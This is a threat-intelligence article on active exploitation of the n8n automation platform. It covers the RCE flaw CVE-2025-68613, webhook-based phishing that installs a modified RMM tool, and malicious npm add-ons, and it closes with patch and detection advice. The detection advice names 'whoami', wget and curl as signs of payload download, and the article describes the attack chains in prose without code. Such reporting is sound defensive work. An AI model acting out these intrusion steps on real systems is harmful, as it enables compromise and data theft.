Threat actors are actively exploiting n8n, a widely deployed open-source workflow automation platform, through a combination of webhook abuse, a critical remote code execution (RCE) vulnerability, and supply chain attacks - posing elevated risks to enterprise software delivery pipelines across regulated and non-regulated industries.
Background
N8n is a workflow automation platform that enables users to connect web applications, APIs, and AI model services to sync data, build agentic systems, and run repetitive rule-based tasks. Its growing adoption as a central orchestration layer in enterprise environments has made it an increasingly attractive target. Because n8n frequently connects internal systems, cloud services, and third-party APIs, the impact of a compromise often cascades across an entire organization.
The platform's attack surface expanded significantly after CVE-2025-68613 was publicly disclosed on December 19, 2025. The vulnerability stems from insufficient isolation in n8n's workflow expression evaluation system, enabling authenticated users to supply specially crafted expressions during workflow configuration that bypass execution context protections and execute arbitrary code on the underlying runtime. It received a CVSS score of 9.9 (Critical) due to its low attack complexity, high impact, and the fact that it affects core application functionality.
Attack Methods and Scope
Active exploitation materialized quickly. Akamai's security intelligence and response team first identified exploitation in mid-January 2026, observing the Zerobot botnet leveraging the vulnerability - the first publicly reported exploitation since disclosure. On March 11, 2026, CISA added CVE-2025-68613 to its Known Exploited Vulnerabilities (KEV) catalog, setting a remediation deadline of March 25, 2026, for federal agencies.
The scale of exposure is significant. Security researchers at Censys identified approximately 103,476 potentially vulnerable n8n instances accessible across the internet, according to CyberPress. The platform's enterprise adoption means compromised instances could facilitate lateral movement, data exfiltration, and supply chain attacks.
Multiple threat actors, including a possible ransomware operator, have shared links to an exploit derived from open-source reporting, and exploitation in the wild has been confirmed. Intel 471's Vulnerability Intelligence researchers observed a publicly available Metasploit module for CVE-2025-68613, noting that the vulnerability has been weaponized and productized.
Parallel to direct exploitation, a separate and sustained phishing campaign has leveraged the platform's legitimate webhook infrastructure. Cisco Talos observed a significant rise in emails containing n8n webhook URLs over the past year, with volume in March 2026 approximately 686% higher than in January 2025. Because webhooks mask the source of the data they deliver, they can serve payloads from untrusted sources while appearing to originate from a trusted domain. Webhooks can also dynamically serve different data streams based on triggering events - such as request header information - allowing a phishing operator to tailor payloads based on the user-agent header.
In one documented campaign, threat actors embedded n8n-hosted webhook links in emails posing as shared documents. Clicking the link directed users to a page displaying a CAPTCHA, which upon completion triggered the download of a malicious payload from an external host. When opened, the payload installed a modified version of the Datto Remote Monitoring and Management (RMM) tool and executed a chain of PowerShell commands.
The vulnerability landscape broadened further in February 2026. Six additional vulnerabilities were discovered in the n8n platform, four rated critical with CVSS severity scores of 9.4. Separately, threat actors were found targeting n8n by planting malicious packages on the npm registry disguised as legitimate n8n add-ons.
Defensive Guidance and Outlook
Security teams face a compounded threat requiring action on multiple fronts. The definitive remediation for CVE-2025-68613 is an immediate upgrade to patched versions 1.120.4, 1.121.1, or 1.122.0, according to Resecurity. For organizations unable to deploy patches immediately, n8n recommends restricting workflow creation and editing permissions to trusted personnel only and deploying n8n in hardened environments with minimal operating system privileges and restricted network access.
Intel 471 recommends monitoring for unexpected child process spawns originating from the n8n process, particularly those executing system commands such as "id" and "whoami," or executables that can act as payload downloaders such as wget and curl, as these indicate active exploitation attempts.
On the webhook abuse front, defenders should implement behavioral detection that triggers alerts when unusually high traffic volumes target automation platform domains from unexpected internal sources. They should also flag any endpoint communicating with AI automation platform domains outside the organization's approved workflow inventory.
Exploitation of CVE-2025-68613 results in complete loss of trust boundaries within n8n, enabling attackers to operate with the same authority as the automation platform itself. For CIOs and security architects overseeing enterprise automation at scale, the convergence of RCE vulnerabilities, supply chain package poisoning, and trusted-infrastructure abuse represents a structural risk requiring both immediate remediation and longer-term governance of open-source automation tooling.
